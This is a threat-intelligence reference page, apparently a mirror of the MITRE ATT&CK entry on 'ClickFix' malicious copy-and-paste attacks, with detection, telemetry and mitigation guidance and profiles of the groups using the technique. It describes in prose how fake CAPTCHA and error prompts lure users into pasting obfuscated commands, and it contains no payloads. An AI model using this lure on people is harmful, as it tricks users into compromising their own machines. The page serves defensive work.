T1204.004: Malicious Copy and Paste

Malicious Copy and Paste matters because it shifts execution from a downloaded file to a user-pasted command. That can reduce the value of controls focused only on attachments or browser downloads: the user is socially engineered through fake errors, CAPTCHA prompts, or phishing content into launching a command interpreter themselves.

Executive priority

Treat this as an execution-risk control gap test, not just a user-awareness issue. Leaders should ask whether web filtering, email defenses, endpoint execution prevention, and SOC monitoring can connect the full path from browser or email interaction to shell execution on Windows, macOS, and Linux. The business risk is an initial foothold created through ordinary user action that may bypass file-centric prevention and complicate incident triage.

Technical view

For SOC, detection engineering, and IR teams, validate coverage for browser/email-to-shell behavior involving command and scripting interpreters, especially suspicious or obfuscated one-line commands. ATT&CK provides no official detection text for this sub-technique, but the supplied relationship to DET0340 points to a strategy focused on browser/email leading to shell execution with obfuscated one-liners. Tune detections around parent/ancestor process context, command-line content, interpreter invocation, and follow-on network or payload activity rather than the pasted text alone.

Likely telemetry

Endpoint process creation events with parent and ancestor process context
Command-line and script execution logs for command and scripting interpreters
Windows Run Dialog or terminal launch evidence where available
Browser, web proxy, URL filtering, and DNS logs tied to suspicious prompt pages
Email security and attachment interaction logs for phishing-delivered fake errors

Detection direction

Validate DET0340-style analytics for browser or email clients spawning shells, terminals, or scripting interpreters.
Prioritize command-line visibility; without it, obfuscation and encoded commands are much harder to assess.
Correlate web or email interaction shortly before shell execution to reduce noise from legitimate administrator or developer activity.
Expect false positives from IT support, developers, and power users who routinely paste commands; tune with user role, device type, destination, and command characteristics.
Do not rely only on malicious file detection, because the technique is specifically useful when no attachment or downloaded executable is required.

Mitigation priorities

Start with M1021 Restrict Web-Based Content: reduce access to malicious prompt pages through URL filtering, script controls, download restrictions, and browser policy controls where applicable.
Apply M1038 Execution Prevention so unauthorized scripts, commands, and untrusted code paths are constrained even when a user initiates them.
Use M1031 Network Intrusion Prevention at boundaries to block known malicious traffic patterns where signatures are available.
Use incident response findings to identify where email, browser, endpoint, and network controls failed to break the chain from lure to interpreter execution.

Analyst notes and limits

This is a sub-technique of User Execution and is mapped to the execution tactic across Linux, macOS, and Windows. ATT&CK relationships also show use by MuddyWater, Kimsuky, Contagious Interview, and Havoc; that should inform threat modeling, not be treated as proof of local exposure or active targeting.

Official ATT&CK detection guidance is not provided for this object. Defensive value depends on local logging depth, especially command-line capture and process lineage. The supplied data supports general control and telemetry priorities, but not vendor-specific detections, guaranteed coverage, or claims of active exploitation in any environment.

Official MITRE ATT&CK definition

Malicious Copy and Paste

An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.

Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.[1][2][3][4]

Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the "ClickFix" strategy.[5][6]

Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Filter related techniques 1 rows

Domain	ID	Name	Relationship / procedure
Enterprise	T1204	User Execution	This object subtechnique of User Execution.

Associated objects

Groups, software, and campaigns

G0069: MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. MuddyWater has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, MuddyWater used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. [2][3][4][5][6][7][8][9][10][11][12][13]

G0094: Kimsuky

Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.[1][2][3][4][5][6]

Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).[7][8][9] In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.[10]

DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.

G1052: Contagious Interview

Contagious Interview is a North Korea–aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. Contagious Interview targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities. [1][2][3][4][5][6][7][8]

S1229: Havoc

Havoc is an open-source post-exploitation command and control (C2) framework first released on GitHub in October 2022 by C5pider (Paul Ungur), who continues to maintain and develop it with community contributors. Havoc provides a wide range of offensive security capabilities and has been adopted by multiple threat actors to establish and maintain control over compromised systems.

LinuxmacOSWindows

Relationship explorer

All related ATT&CK context

uses · Group G0069: MuddyWater Enterprise uses · Group G0094: Kimsuky Enterprise mitigates · Mitigation M1038: Execution Prevention Enterprise uses · Malware S1229: Havoc Enterprise detects · Detection Strategy DET0340: User Execution – Malicious Copy & Paste (browser/email → shell with obfuscated one-liner) – T1204.004 Enterprise mitigates · Mitigation M1031: Network Intrusion Prevention Enterprise uses · Group G1052: Contagious Interview Enterprise mitigates · Mitigation M1021: Restrict Web-Based Content Enterprise subtechnique of · Technique T1204: User Execution Enterprise

Mitigations

Mitigation direction

M1038: Execution Prevention

Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures:

Application Control:

- Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution. - Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.xml"`)

Script Blocking:

- Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources. - Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`)

Executable Blocking:

- Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories. - Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories.

Dynamic Analysis Prevention: - Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time. - Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution.

M1031: Network Intrusion Prevention

Use intrusion detection signatures to block traffic at network boundaries.

M1021: Restrict Web-Based Content

Restricting web-based content involves enforcing policies and technologies that limit access to potentially malicious websites, unsafe downloads, and unauthorized browser behaviors. This can include URL filtering, download restrictions, script blocking, and extension control to protect against exploitation, phishing, and malware delivery. This mitigation can be implemented through the following measures:

Deploy Web Proxy Filtering:

- Use solutions to filter web traffic based on categories, reputation, and content types. - Enforce policies that block unsafe websites or file types at the gateway level.

Enable DNS-Based Filtering:

- Implement tools to restrict access to domains associated with malware or phishing campaigns. - Use public DNS filtering services to enhance protection.

Enforce Content Security Policies (CSP):

- Configure CSP headers on internal and external web applications to restrict script execution, iframe embedding, and cross-origin requests.

Control Browser Features:

- Disable unapproved browser features like automatic downloads, developer tools, or unsafe scripting. - Enforce policies through tools like Group Policy Management to control browser settings.

Monitor and Alert on Web-Based Threats:

- Use SIEM tools to collect and analyze web proxy logs for signs of anomalous or malicious activity. - Configure alerts for access attempts to blocked domains or repeated file download failures.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 1.1
Created: Mar 18, 2025, 12:57 UTC (UTC+00:00)
Modified: May 12, 2026, 15:12 UTC (UTC+00:00)
Raw hash: e8525fb91f3598e2...

Imported snapshots across ATT&CK releases (1)

Release	Bundle imported	Object version	Modified	Status	Raw hash
19.1	May 18, 2026, 07:08 UTC (UTC+00:00)	1.1	May 12, 2026, 15:12 UTC (UTC+00:00)	Current bundle	`e8525fb91f35…`

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1]
CloudSEK Lumma Stealer 2024

CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.
Open source URL
[2]
Sekoia ClickFake 2025

Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.
Open source URL
[3]
Reliaquest CAPTCHA 2024

Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.
Open source URL
[4]
AhnLab LummaC2 2025

AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.
Open source URL
[5]
Proofpoint ClickFix 2024

Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.
Open source URL
[6]
AhnLab Malicioys Copy Paste 2024

AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.
Open source URL
[7]
mitre-attack T1204.004
Open source URL

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use

Analyst context for executives and security teams